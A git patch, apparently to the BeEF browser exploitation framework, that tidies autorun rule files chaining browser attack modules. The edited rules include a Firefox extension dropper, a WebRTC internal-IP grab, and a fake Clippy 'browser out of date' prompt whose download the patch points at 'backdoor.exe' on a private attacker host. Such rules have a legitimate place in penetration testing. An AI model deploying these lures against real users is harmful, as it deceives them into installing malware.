From b7788d6fe543ae490ab373808274cafa327b5117 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Mon, 27 Jul 2015 12:31:37 +0200 Subject: [PATCH] Cleaned rules. --- arerules/c_osx_test-return-mods.json | 4 ++-- arerules/ff_osx_extension-dropper.json | 6 +++--- arerules/ff_tux_webrtc-internalip.json | 2 +- arerules/ie_win_fakenotification-clippy.json | 2 +- arerules/ie_win_test-return-mods.json | 15 --------------- 5 files changed, 7 insertions(+), 22 deletions(-) diff --git a/arerules/c_osx_test-return-mods.json b/arerules/c_osx_test-return-mods.json index 352902081..d29944c49 100644 --- a/arerules/c_osx_test-return-mods.json +++ b/arerules/c_osx_test-return-mods.json @@ -12,7 +12,7 @@ }, { "name": "test_return_long_string", "condition": "status==1", - "code": "var mod_input=test_return_ascii_chars_mod_output + '--(DUPA)--';", + "code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';", "options": { "repeat": "10", "repeat_string": "<>" @@ -21,7 +21,7 @@ { "name": "alert_dialog", "condition": "status=1", - "code": "var mod_input=test_return_long_string_mod_output + '--(SUTEK)--';", + "code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';", "options":{"text":"<>"} }, { diff --git a/arerules/ff_osx_extension-dropper.json b/arerules/ff_osx_extension-dropper.json index 64575f0dc..2f4bb35f1 100644 --- a/arerules/ff_osx_extension-dropper.json +++ b/arerules/ff_osx_extension-dropper.json @@ -9,9 +9,9 @@ "name": "firefox_extension_dropper", "condition": null, "options": { - "extension_name": "DownThem All - Download Manager", - "xpi_name": "Down-Them-All", - "base_host": "http://127.0.0.1:3000" + "extension_name": "Ummeneske", + "xpi_name": "Ummeneske", + "base_host": "http://172.16.45.1:3000" } }], "execution_order": [0], diff --git a/arerules/ff_tux_webrtc-internalip.json b/arerules/ff_tux_webrtc-internalip.json index ad1734eff..d429f03de 100644 --- a/arerules/ff_tux_webrtc-internalip.json +++ b/arerules/ff_tux_webrtc-internalip.json @@ -1,7 +1,7 @@ {"name": "Get Internal IP (WebRTC)", "author": "antisnatchor", "browser": "FF", - "browser_version": ">= 30", + "browser_version": ">= 31", "os": "Linux", "os_version": "ALL", "modules": [ diff --git a/arerules/ie_win_fakenotification-clippy.json b/arerules/ie_win_fakenotification-clippy.json index 05c017161..bd84eb1e0 100644 --- a/arerules/ie_win_fakenotification-clippy.json +++ b/arerules/ie_win_fakenotification-clippy.json @@ -19,7 +19,7 @@ "options": { "clippydir": "http://clippy.ajbnet.com/1.0.0/", "askusertext": "Your browser appears to be out of date. Would you like to upgrade it?", - "executeyes": "http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe", + "executeyes": "http://172.16.45.1:3000/updates/backdoor.exe", "respawntime":"5000", "thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!" } diff --git a/arerules/ie_win_test-return-mods.json b/arerules/ie_win_test-return-mods.json index 19d22fc71..657bb2026 100644 --- a/arerules/ie_win_test-return-mods.json +++ b/arerules/ie_win_test-return-mods.json @@ -25,26 +25,11 @@ "options":{"text":"<>"} }, { - // this doesn't execute atm as the setInterval call loops infinitely. Add a timeout of X second to continue anyway. "name": "get_page_html", "condition": null, "options": {} }], "execution_order": [0, 1, 2, 3], "execution_delay": [0, 0, 0, 0], - /* chain_mode can be 'sequential' or 'nested-forward': - # - # - sequential chain with delays (setTimeout stuff) - # ex.: setTimeout(module_one(), 0); - # setTimeout(module_two(), 2000); - # setTimeout(module_three(), 3000); - # - # - nested forward chain with status checks (setInterval to wait for command to return from async operations) - # ex.: module_one() - # if result == success - # module_two(module_one_output) - # if result == success - # module_three(module_two_output) - #*/ "chain_mode": "nested-forward" } \ No newline at end of file